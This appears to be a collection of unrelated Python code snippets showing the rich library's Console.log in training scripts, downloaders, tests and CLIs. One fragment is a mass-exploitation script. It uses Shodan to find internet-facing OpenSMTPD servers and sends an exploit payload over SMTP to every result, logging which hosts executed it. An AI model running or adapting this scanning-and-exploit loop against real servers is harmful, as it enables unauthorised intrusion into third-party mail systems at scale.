def menuOptions(): console = Console() console.print( ":computer: Welcome to machine learning application :computer:", style="BOLD GREEN") menu = SelectMenu() menu.add_choices([ "1. Introduction to Python", "2. Animation in python", "3. Advanced Python" ]) result = menu.select("Choice languages") if result == "1. Introduction to Python": console.log(":computer: Welcome to Basic python section", style="BOLD Cyan") submenu = SelectMenu() submenu.add_choices([ "1. Python Introduction", "2. Python Flow Control", "3. Python Functions", "4. Python Datatypes in depth", "5. Python Files", "6. Python Object & Class", "7. Python Advanced Topics", "8. Python Date and time" ]) basicTopics = submenu.select("Choice topic to learn") if basicTopics == "1. Python Introduction": basics.helloPython() elif basicTopics == "2. Python Flow Control": flowControl.flowcontrolInpython() elif basicTopics == "3. Python Functions": pythonFunctions.pythonFunctions() elif result == "2. Animation in python": animatedfigures.animatedGraph()
def main(): """Main function for single or distributed CLAPP training.""" config = CLAPPConfig.parse_arguments() os.environ['CUDA_VISIBLE_DEVICES'] = ','.join([str(gpu) for gpu in config.gpus]) num_gpus_per_node = len(config.gpus) world_size = config.num_nodes * num_gpus_per_node distributed = world_size > 1 setattr(config, 'num_gpus_per_node', num_gpus_per_node) setattr(config, 'world_size', world_size) setattr(config, 'distributed', distributed) console = Console() console.log(config.__dict__) config.save() if config.distributed: rich.print(f"Distributed training on {world_size} GPUs.") mp.spawn( main_worker, nprocs=config.num_gpus_per_node, args=(config, ) ) else: rich.print(f"Single GPU training.") main_worker(0, config=config) # single machine, single gpu
def check_for_updates() -> None: """Checks for new releases. Using Github API checks for new release and prints information of new release if available. """ console = Console() try: headers: dict = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36", } conn = http.client.HTTPSConnection("api.github.com") conn.request( method="GET", url= "/repos/Dineshkarthik/telegram_media_downloader/releases/latest", headers=headers, ) res = conn.getresponse() latest_release: dict = json.loads(res.read().decode("utf-8")) if f"v{__version__}" != latest_release["tag_name"]: update_message: str = ( f"## New version of Telegram-Media-Downloader is available - {latest_release['name']}\n" f"You are using an outdated version v{__version__} please pull in the changes using `git pull` or download the latest release.\n\n" f"Find more details about the latest release here - {latest_release['html_url']}" ) console.print(Markdown(update_message)) except Exception as e: console.log( f"Following error occured when checking for updates\n{e.__class__}, {e}" )
def run(): console = Console() console.rule("Cartographer") auth_session = kroger.authorize(console) with console.status("Setting up...") as status: status.update("Loading spreadsheet...") items = sheets.get_items(console) status.update("Loading model...") tokenizer, model = heuristics.load_tokenizer_and_model() console.log("Loaded model.") status.update("Picking groceries...") selected_items = {} for i, (item, count, description) in enumerate(items): status.update(f"Picking groceries [green]({i}/{len(items)})...") search_results = kroger.product_search(item, auth_session) selected = heuristics.select_item( item, search_results.json()["data"], description, tokenizer, model, console, ) selected_items[selected["upc"]] = count status.update("Adding to cart...") kroger.add_to_cart(selected_items, auth_session) console.log("Done!")
def _add_current_path(): from rich.console import Console c = Console() path = Path.cwd().resolve() c.log("Adding cwd to project-paths", {path.name: path}) get_added_paths(str(path))
def generate_moved(destination: str, *, location: str, console: Console): template = Path("templates") / "moved.py" assert template.exists() rendered_template = template.read_text().format(location=location) console.log(f" Writing [blue]{destination}[reset]") console.log(f" Points users to [cyan]{location}[reset]") Path(destination).write_text(rendered_template)
def test_justify(): console = Console(width=20, log_path=False, log_time=False, color_system=None) console.begin_capture() console.log("foo", justify="right") result = console.end_capture() assert result == " foo\n"
def print_meta(logger): """Prints meta-data of the downloader script.""" console = Console() # pylint: disable = C0301 console.log( f"[bold]Telegram Media Downloader v{__version__}[/bold],\n[i]{__copyright__}[/i]" ) console.log(f"Licensed under the terms of the {__license__}", end="\n\n") logger.info(f"Device: {DEVICE_MODEL} - {APP_VERSION}") logger.info(f"System: {SYSTEM_VERSION} ({LANG_CODE.upper()})")
def test_log_milliseconds(): def time_formatter(timestamp: datetime) -> Text: return Text("TIME") console = Console( file=io.StringIO(), width=40, log_time_format=time_formatter, log_path=False ) console.log("foo") result = console.file.getvalue() assert result == "TIME foo \n"
def render_log(): console = Console( file=io.StringIO(), width=80, force_terminal=True, log_time_format="[TIME]", color_system="truecolor", ) console.log() console.log("Hello from", console, "!") console.log(test_data, log_locals=True) return console.file.getvalue()
def render_log(): console = Console( file=io.StringIO(), width=80, force_terminal=True, log_time_format="[TIME]", color_system="truecolor", legacy_windows=False, ) console.log() console.log("Hello from", console, "!") console.log(test_data, log_locals=True) return replace_link_ids(console.file.getvalue()).replace("test_log.py", "source.py")
def test_log(): console = Console( file=io.StringIO(), width=80, color_system="truecolor", log_time_format="TIME", log_path=False, ) console.log("foo", style="red") expected = "\x1b[2;36mTIME\x1b[0m\x1b[2;36m \x1b[0m\x1b[31mfoo\x1b[0m\x1b[31m \x1b[0m\n" result = console.file.getvalue() print(repr(result)) assert result == expected
def scraper_worker_handler(event, context): console = Console(file=sys.stdout, record=True) run_log = settings.RUN_LOGGER(start=datetime.datetime.utcnow()) message = json.loads(event["Records"][0]["body"]) council = message["council"] command_name = message["scraper_type"] console.log(f"Fetching Scraper for: {council}") scraper_cls = load_scraper(council, command_name) if not scraper_cls: return console.log(f"Begin attempting to scrape: {council}") options = {"council": council, "verbose": True, "aws_lambda": True} scraper = scraper_cls(options, console) try: if not scraper.disabled: scraper.run(run_log) else: console.log(f"Scraper for {council} is disabled") except Exception as e: scraper.console.log(e) run_log.error = traceback.format_exc() # This probably means aws_tidy_up hasn't been called. # Let's do that ourselves then scraper.aws_tidy_up(run_log) console.log(f"Finished running scraper for: {council}")
def test_locals(): foo = (1, 2, 3) movies = ["Deadpool", "Rise of the Skywalker"] console = Console() console.log( "[b]JSON[/b] RPC [i]batch[/i]", [ { "jsonrpc": "2.0", "method": "sum", "params": [1, 2, 4], "id": "1" }, { "jsonrpc": "2.0", "method": "notify_hello", "params": [7] }, { "jsonrpc": "2.0", "method": "subtract", "params": [42, 23], "id": "2" }, { "foo": "boo" }, { "jsonrpc": "2.0", "method": "foo.get", "params": { "name": "myself", "enable": False, "grommits": None }, "id": "5", }, { "jsonrpc": "2.0", "method": "get_data", "id": "9" }, ], log_locals=True, )
def test_columns() -> None: console = Console( file=io.StringIO(), force_terminal=True, width=80, log_time_format="[TIME]", color_system="truecolor", legacy_windows=False, log_path=False, _environ={}, ) progress = Progress( "test", TextColumn("{task.description}"), BarColumn(bar_width=None), TimeRemainingColumn(), TimeElapsedColumn(), FileSizeColumn(), TotalFileSizeColumn(), DownloadColumn(), TransferSpeedColumn(), MofNCompleteColumn(), MofNCompleteColumn(separator=" of "), transient=True, console=console, auto_refresh=False, get_time=MockClock(), ) task1 = progress.add_task("foo", total=10) task2 = progress.add_task("bar", total=7) with progress: for n in range(4): progress.advance(task1, 3) progress.advance(task2, 4) print("foo") console.log("hello") console.print("world") progress.refresh() from .render import replace_link_ids result = replace_link_ids(console.file.getvalue()) print(repr(result)) expected = "\x1b[?25ltest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2Kfoo\ntest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2K\x1b[2;36m[TIME]\x1b[0m\x1b[2;36m \x1b[0mhello \ntest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2Kworld\ntest foo \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:07\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m10 bytes\x1b[0m \x1b[32m0/10 bytes\x1b[0m \x1b[31m?\x1b[0m \x1b[32m 0/10\x1b[0m \x1b[32m 0 of 10\x1b[0m\ntest bar \x1b[38;5;237m━━━━━━━━━━\x1b[0m \x1b[36m-:--:--\x1b[0m \x1b[33m0:00:18\x1b[0m \x1b[32m0 bytes\x1b[0m \x1b[32m7 bytes \x1b[0m \x1b[32m0/7 bytes \x1b[0m \x1b[31m?\x1b[0m \x1b[32m0/7 \x1b[0m \x1b[32m0 of 7 \x1b[0m\r\x1b[2K\x1b[1A\x1b[2Ktest foo \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:34\x1b[0m \x1b[32m12 \x1b[0m \x1b[32m10 \x1b[0m \x1b[32m12/10 \x1b[0m \x1b[31m1 \x1b[0m \x1b[32m12/10\x1b[0m \x1b[32m12 of 10\x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbyte/s \x1b[0m \ntest bar \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:29\x1b[0m \x1b[32m16 \x1b[0m \x1b[32m7 bytes\x1b[0m \x1b[32m16/7 \x1b[0m \x1b[31m2 \x1b[0m \x1b[32m16/7 \x1b[0m \x1b[32m16 of 7 \x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbytes/s\x1b[0m \r\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2Ktest foo \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:34\x1b[0m \x1b[32m12 \x1b[0m \x1b[32m10 \x1b[0m \x1b[32m12/10 \x1b[0m \x1b[31m1 \x1b[0m \x1b[32m12/10\x1b[0m \x1b[32m12 of 10\x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbyte/s \x1b[0m \ntest bar \x1b[38;2;114;156;31m━━━━━━━\x1b[0m \x1b[36m0:00:00\x1b[0m \x1b[33m0:00:29\x1b[0m \x1b[32m16 \x1b[0m \x1b[32m7 bytes\x1b[0m \x1b[32m16/7 \x1b[0m \x1b[31m2 \x1b[0m \x1b[32m16/7 \x1b[0m \x1b[32m16 of 7 \x1b[0m\n \x1b[32mbytes \x1b[0m \x1b[32mbytes \x1b[0m \x1b[31mbytes/s\x1b[0m \n\x1b[?25h\r\x1b[1A\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2K\x1b[1A\x1b[2K" assert result == expected
def fetch_repos(self): next_page = 1 repositories = [] console = Console() headers = self.set_headers() with console.status( "[bold green]Fetching repositories from github..."): self.response = requests.request(self.method, url=self.url, headers=headers) self.update_rate_limit_info() repositories.extend(self.response.json()) console.log( f"Success - Fetched Repositories (1 - {len(repositories)})") if 'link' in self.response.headers: next_page += 1 link_header = self.response.headers['link'] last_page = int( re.findall(r'&page=(\d+)>; rel="last"', link_header)[0]) with console.status( f"[bold green]Fetching additional repositories..."): while next_page <= last_page: next_url = self.url + f"&page={next_page}" next_response = requests.request(self.method, url=next_url, headers=headers) self.update_rate_limit_info() next_repo_array = next_response.json() repositories.extend(next_response.json()) starting_repo_index = (next_page - 1) * 100 completed_range = f"({starting_repo_index} - {starting_repo_index + len(next_repo_array)})" time.sleep(.2) console.log( f"Success - Fetched Repositories {completed_range}") next_page += 1 if self.rate_limit_verbose: self.display_rate_limit_info() return repositories
def main(): from rich.logging import RichHandler logging.basicConfig(level="INFO", format="%(message)s", datefmt="[%X]", handlers=[RichHandler(rich_tracebacks=True)]) console = Console() obj = NanoContext(console) try: cli(obj=obj, show_default=True) except Exception as e: console.log("[bold red]Exception caught[/bold red]") if not obj.print_traceback: console.log(e) else: console.print_exception()
def deploy_public_sandbox(uses: str): """ Deploy a public sandbox to Jina Hub. :param uses: the executor uses string :return: the host and port of the sandbox """ scheme, name, tag, secret = parse_hub_uri(uses) payload = { 'name': name, 'tag': tag if tag else 'latest', 'jina': __version__, } from rich.progress import Console import requests console = Console() host = None try: res = requests.get( url=get_hubble_url_v2() + '/rpc/sandbox.get', params=payload, headers=get_request_header(), ).json() if res.get('code') == 200: host = res.get('data', {}).get('host', None) except Exception: raise if host: return host, 443 with console.status( f"[bold green]Deploying sandbox for ({name}) since no existing one..." ): try: json = requests.post( url=get_hubble_url_v2() + '/rpc/sandbox.create', json=payload, headers=get_request_header(), ).json() host = json.get('data', {}).get('host', None) livetime = json.get('data', {}).get('livetime', '15 mins') if not host: raise Exception(f'Failed to deploy sandbox: {json}') console.log(f"Deployment completed: {host}") console.log( f"[bold green]This sandbox will be removed when no traffic during {livetime}" ) except: console.log("Deployment failed") raise return host, 443
def parse_dx(dx: Analysis, fn_match=None, outfile=None): console = Console() out = {} out.update(JNI_COMMON) count = 0 for cx in dx.get_internal_classes(): methods = parse_class_def(cx.get_class()) count += 1 if not methods: continue cname = methods[0].jclass if fn_match and not fn_match(cname): continue for m in methods: out.update(m.as_dict) console.log(f"Parse {count} classes.") console.log(f"Found {len(out)} JNI methods.") if not outfile: console.print_json(data=out) else: with open(outfile, 'w') as f: json.dump(out, f, indent=2, ensure_ascii=False)
def main() -> None: console = Console() with console.status("Fetching pip versions..."): pip_versions = get_all_pip_versions() console.log(f"Found {len(pip_versions)} available pip versions.") console.log(f"Latest version: {max(pip_versions)}") with console.status("Generating scripts...") as status: for variant, mapping in populated_script_constraints(SCRIPT_CONSTRAINTS): status.update(f"Working on [magenta]{variant}") console.log(f"[magenta]{variant}") generate_one(variant, mapping, console=console, pip_versions=pip_versions) if MOVED_SCRIPTS: console.log("[magenta]Generating 'moved' scripts...") with console.status("Generating 'moved' scripts...") as status: for legacy, current in MOVED_SCRIPTS.items(): status.update(f"Working on [magenta]{legacy}") generate_moved(legacy, console=console, location=current)
def __print_step(step: Step, store: frozendict) -> None: """ Prints passed step and store to the console :param step: :param store: :return: None """ console = Console() console.log('Current step is -> ', step.__class__.__name__, f'({step.__module__})') console.log(f'{step.__class__.__name__} STORE STATE') console.print(store.__dict__, overflow='fold') console.log('\n\n')
def execute(self, app_path, clients, check, delete): self.reporter.apps(app_path, clients) app_name = app_path.split("/")[-1] # fetch resources data console = Console() self.reporter.resources_processing_started() with console.status("[bold green]Processing project resources..."): packaged_resources = self.resources_fetcher.fetch_packaged_resources( app_path) console.log(f"{app_name} - packaged resources processed!") usage_references = self.resources_fetcher.fetch_used_resources( app_path) console.log(f"{app_name} - used resources processed!") for client in clients: client_app_name = client.split("/")[-1] usage_references = usage_references.union( self.resources_fetcher.fetch_used_resources(client)) console.log(f"{client_app_name} - used resources processed!") # analyze data analysis = self.analyzer.analyze( app_path.split("/")[-1], usage_references, packaged_resources) # report self.reporter.reporting_started(analysis) self.reporter.report(analysis) # check if check: try: self.validator.validate(analysis) except UnusedResourcesException as e: paths = "\n".join([r.filepath for r in e.unused_resources]) self.reporter.error( f"\nUnused Resources have been found!\n{paths}") sys.exit(1) if delete: resources_to_delete = set.union( *analysis.unused_resources.values()) self.resources_modifier.delete_resources(resources_to_delete) self.reporter.deletion_completed(len(resources_to_delete))
async def create( cls, console: Console, bake_id: str, client: Client, storage: Storage, *, polling_timeout: Optional[float] = 1, project_role: Optional[str] = None, ) -> AsyncIterator["BatchExecutor"]: storage = storage.with_retry_read() console.log("Fetch bake data") bake_storage = storage.bake(id=bake_id) bake = await bake_storage.get() if bake.last_attempt: attempt = bake.last_attempt attempt_storage = bake_storage.attempt(id=bake.last_attempt.id) else: attempt_storage = bake_storage.last_attempt() attempt = await attempt_storage.get() console.log("Fetch configs metadata") flow = await get_running_flow(bake, client, bake_storage, attempt.configs_meta) console.log(f"Execute attempt #{attempt.number}") ret = cls( console=console, flow=flow, bake=bake, attempt=attempt, client=RetryReadNeuroClient(client), storage=attempt_storage, bake_storage=bake_storage, project_storage=storage.project(id=bake.project_id), polling_timeout=polling_timeout, project_role=project_role, ) ret._start() try: yield ret finally: ret._stop()
from rich.table import Table from rich.prompt import Prompt cpf = 0 conf = 0 opc = 0 prompt = Prompt() console = Console() table = Table(title="DJHOW TELECOM\n") table.add_column("Plano", style="bold green") table.add_column("Velocidade", style="bold blue") table.add_column("Valor", style="bold yellow") table.add_row("Básico", "100 Mbps", "R$ 50,00") table.add_row("Premium", "250 Mbps", "R$ 80,00") table.add_row("Master", "1 Gbps", "R$ 150,00") while conf == 0: cpf = int(input("Informe o número do seu CPF: ")) conf = prompt.ask( f'CPF informado: [on black]{cpf}[/]. Correto (1-sim/0-não)?') for i in track(range(10), "Aguarde enquanto buscamos seu CPF no sistema..."): sleep(1) print(" ") print(":white_check_mark: Análise finalizada!") print(" ") console.log(table)
if __name__ == "__main__": args = parse_arguments() workdir = os.path.join(os.path.abspath(args.workdir), args.workdirtag) inputfile = os.path.abspath(args.inputfile) emb_folder = os.path.abspath(args.embedding_scripts_folder) era = [ s for s in emb_folder.split("_") if s in ["2016_preVFP", "2016_postVFP", "2017", "2018"] ][0] config = yaml.safe_load(open("scripts/ul_config.yaml", "r")) main_cmssw = os.path.abspath(config["cmssw_version"][era]["main"]) hlt_cmssw = os.path.abspath(config["cmssw_version"][era]["hlt"]) # main_cmssw = os.path.abspath("CMSSW_10_6_28") # hlt_cmssw = os.path.abspath("CMSSW_10_2_16_UL") console.log(f"Using main CMSSW version: {main_cmssw}") console.log(f"Using HLT CMSSW version: {hlt_cmssw}") start_index = 0 tasks = embedding_order if args.run_preselection: if "preselection.py" in os.listdir(emb_folder): tasks = ["preselection.py"] start_index = 0 else: console.print("preselection.py not found in embedding folder") raise FileNotFoundError else: if not args.run_all: starttask = enquiries.choose("Pick tasks to start with", embedding_order) start_index = embedding_order.index(starttask)
b'DATA\r\n', b'\r\nxxx\r\n.\r\n', b'QUIT\r\n', ] for data in datas: writer.write(data) response = await receive(reader) console.log(f'{"%s:%d" % (addr, port):<21}[white]([green]success: payload executed[/green])[/white]') except: return loop = asyncio.get_event_loop() client = shodan.Shodan(key=SHODAN_API_KEY) console.log('gathering targets...') search_result = client.search('OpenSMTPD') targets = [(match['ip_str'], match['port']) for match in search_result['matches']] tasks = [] console.log('scraped %d ips and ports' % len(targets)) for addr, port in targets: tasks.append(exploit(addr, port, PAYLOAD)) loop.run_until_complete(asyncio.wait(tasks))
all_words = [] xy = [] for intent in intents['intents']: tag = intent['tag'] tags.append(tag) for pattern in intent['patterns']: w = tokenize(pattern) all_words.extend(w) xy.append((w, tag)) ignore_words = ['?', '.', '!'] all_words = [stem(w) for w in all_words if w not in ignore_words] all_words = sorted(set(all_words)) tags = sorted(set(tags)) console.log(len(xy), "patterns") console.log(len(tags), f"tags: {tags}") console.log(len(all_words), f"unique stemmed words: {all_words}") X_train = [] y_train = [] for (pattern_sentence, tag) in xy: bag = bag_of_words(pattern_sentence, all_words) X_train.append(bag) label = tags.index(tag) y_train.append(label) X_train = np.array(X_train) y_train = np.array(y_train) # Hyper-parameters
def hermes(args: Optional[List[str]] = None) -> None: """HermesPy Command Line Interface. Default entry point to execute hermespy `.yml` files via terminals. Args: args ([List[str], optional): Command line arguments. By default, the system argument vector will be interpreted. """ # Recover command line arguments from system if none are provided if args is None: args = sys.argv[1:] parser = argparse.ArgumentParser( description='HermesPy - The Heterogeneous Mobile Radio Simulator', prog='hermes') parser.add_argument( "-p", help="settings directory from which to read the configuration", type=str) parser.add_argument( "-o", help="output directory to which results will be dumped", type=str) parser.add_argument("-s", help="style of result plots", type=str) parser.add_argument('-t', '--test', action='store_true', help='run in test-mode, does not dump results') parser.add_argument('-l', '--log', action='store_true', help='log the console information to a txt file') arguments = parser.parse_args(args) input_parameters_dir = arguments.p results_dir = arguments.o style = arguments.s # Create console console = Console(record=arguments.log) console.show_cursor(False) # Draw welcome header console.print( "\n[bold green]Welcome to HermesPy - The Heterogeneous Radio Mobile Simulator\n" ) console.print(f"Version: {__version__}") console.print(f"Maintainer: {__maintainer__}") console.print(f"Contact: {__email__}") console.print( "\nFor detailed instructions, refer to the documentation https://barkhausen-institut.github.io/hermespy" ) console.print( "Please report any bugs to https://github.com/Barkhausen-Institut/hermespy/issues\n" ) # Validate command line parameters if not input_parameters_dir: input_parameters_dir = os.path.join(os.getcwd(), '_settings') elif not (os.path.isabs(input_parameters_dir)): input_parameters_dir = os.path.join(os.getcwd(), input_parameters_dir) console.log(f"Configuration will be read from '{input_parameters_dir}'") with console.status("Initializing Environment...", spinner='dots'): ################## # Import executable from YAML config dump factory = Factory() try: # Load serializable objects from configuration files serializables: List[Serializable] = factory.load( input_parameters_dir) # Filter out non-executables from the serialization list executables: List[Executable] = [ s for s in serializables if isinstance(s, Executable) ] # Abort execution if no executable was found if len(executables) < 1: console.log( "No executable routine was detected, aborting execution", style="red") exit(-1) # For now, only single executables are supported executable = executables[0] # Configure executable if results_dir is None: executable.results_dir = Executable.default_results_dir() else: executable.results_dir = results_dir except ConstructorError as error: print( "\nYAML import failed during parsing of line {} in file '{}':\n\t{}" .format(error.problem_mark.line, error.problem_mark.name, error.problem, file=sys.stderr)) exit(-1) # Configure console executable.console = console # Configure style if style is not None: executable.style = style # Inform about the results directory console.log("Results will be saved in '{}'".format( executable.results_dir)) # Dump current configuration to results directory if not arguments.test: shutil.copytree(input_parameters_dir, executable.results_dir, dirs_exist_ok=True) ################## # run simulation executable.execute() ########### # Goodbye :) console.log('Configuration executed. Goodbye.') # Save log if arguments.log: console.save_text(os.path.join(executable.results_dir, 'log.txt'))
from rich.console import Console print("python print") console = Console(force_terminal=True) console.log("console.log", [1, "str"], 'https://github.com/willmcgugan/rich/blob/9cba2027f4/tests/test_color_triplet.py', {"k": 'v', "date": '00:46:54'}, None, '2009-11-27T00:00:00.000100-06:39') console.print("console.print", [1, "str"], 'https://github.com/willmcgugan/rich/blob/9cba2027f4/tests/test_color_triplet.py', {"k": 'v', "date": '00:46:54'}, None, '2009-11-27T00:00:00.000100-06:39')
def print_ports(rem): t = Table("ID", "Port", "Protocol", "Connection Target") n = 0 for _port, conn_type, ext in rem: t.add_row(str(n), str(_port), conn_type, ext) n += 1 console.print(t) if __name__ == "__main__": lineRegex = re.compile( r"^\s*\d+\s(TCP|UDP)\s+(?P<port>\d{1,5})->(?P<ext>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}).+$", re.IGNORECASE + re.VERBOSE, ) console.log("Detecting UPNP ports...") with Live(Spinner("aesthetic", "Getting UPnP Port Listings...", speed=0.1), transient=True): start = time.time() try: detection = run(["upnpc", "-l"], stdout=PIPE, stderr=DEVNULL) except KeyboardInterrupt: console.log("Listing cancelled.") sys.exit(1) end = time.time() if detection.returncode != 0: console.log( f"Got return code [red]{detection.returncode}[/] on UPnP List request. Please ensure UPnP is " f"enabled on your network.") sys.exit(detection.returncode)